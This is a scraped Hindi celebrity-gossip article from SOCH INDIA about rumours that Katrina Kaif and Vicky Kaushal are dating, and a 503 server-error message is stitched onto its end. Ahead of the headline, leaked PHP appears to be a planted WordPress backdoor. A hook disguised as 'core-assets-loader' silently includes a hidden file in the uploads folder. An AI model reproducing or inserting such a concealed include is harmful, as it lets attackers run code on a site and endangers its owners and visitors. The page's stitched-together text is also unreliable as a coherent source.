add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); चुपके-चुपके मिलते हो जरूर कोई बात है…, कैटरीना और विक्की कौशल देर रात हुए स्पॉट – SOCH INDIA
Menu

देश
चुपके-चुपके मिलते हो जरूर कोई बात है…, कैटरीना और विक्की कौशल देर रात हुए स्पॉट

nobanner

विक्की कौशल (Vicky Kaushal) और कैटरीना कैफ (Katrina kaif) के अफेयर के चर्चे आम हैं. खबरें हैं कि दोनों एक-दूसरे को डेट कर रहे हैं. इसी अफवाह पर मुहर लगाती एक तस्वीर भी वायरल हो रही है, जिसमें दोनों को देर रात स्पॉट हुए. बताया जा रहा है कि दोनों दोस्त की पार्टी से निकल रहे थे. इससे पहले भी दोनों को साथ-साथ स्पॉट किया गया. यह पार्टी अली अब्बाज जफर के बर्थडे की थी, जो मुंबई में उनके घर पर रखी गई. इसमें यूं तो कई सेलेब्स पहुंचे थे, लेकिन सभी की निगाहें इन दोनों पर टिकी थीं. इस तस्वीर को मानव मंगलानी के इंस्टाग्राम पर साझा किया है. इस मौके पर कैट ने सफेद रंग की ड्रेस पहनी थी तो वहीं विक्की ने काले रंग का ट्रैक सूट पहना हुआ था. इन पर फैंस जमकर कमेंट कर रहे हैं. कोई उन्हें क्यूट कपल लिख रहा है तो कोई मिस्टर एंड मिसेज कौशल लिख रहा है. ‘सैफीना’ और ‘विरुष्का’ की तरह उनका भी नाम ‘विकैट’ रख दिया गया है.

वैसे, कैटरीना से पहले विक्की कौशल के हरलीन सेठी को डेट करने की खबरें थीं. हरलीन से ब्रेकअप के बाद विक्की का नाम कैटरीना के साथ जुड़ने लगा. इस ब्रेकअप की वजह भी कैट को बताया गया था. कैट-विक्की नोटिस में तब आए जब एक अवार्ड फंक्शन में विक्की कौशल ने सबके सामने कैटरीना से पूछा था कि आप मुझसे शादी करेंगी. इस पर कैट ने मीठा-सा जवाब दिया था कि अब हिम्मत नहीं है.

कैटरीना और विक्की बड़े परदे पर साथ नहीं आए हैं, लेकिन करण जौहर के शो में कैटरीना ने कहा था कि उनकी जोड़ी विक्की कौशल के साथ अच्छी लगेगी.जब विक्की शो में आए तो करण ने उन्हें ये बात बताई, जिसे सुनकर विक्की की खुशी का ठिकाना नहीं रहा था. विक्की कौशल इन दिनों अपनी फिल्म ‘सरदार उधम सिंह’ और ‘तख्त’ में व्यस्त हैं. यूं तो ‘राजी’, संजू समेत विक्की ने कई फिल्मों में काम किया, लेकिन सुपरहिट ‘उरी’ ने उन्हें बड़े स्टार्स की लिस्ट में लाकर खड़ा कर दिया.

कैटरीना की बात करें तो 2016 में उनका रणबीर कपूर से ब्रेकअप हो गया था. उससे पहले उनका नाम सलमान खान के साथ जुड़ा था. दरअसल, उनकी बॉलीवुड में एंट्री करवाने वाले सलमान ही थी. काफी सालों तक वह सलमान और उनके परिवार के करीब रहीं, लेकिन अचानक उनकी रणबीर कपूर के साथ तस्वीरें वायरल हो गईं. कुछ समय बाद उनका रणबीर से भी ब्रेकअप हो गया.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.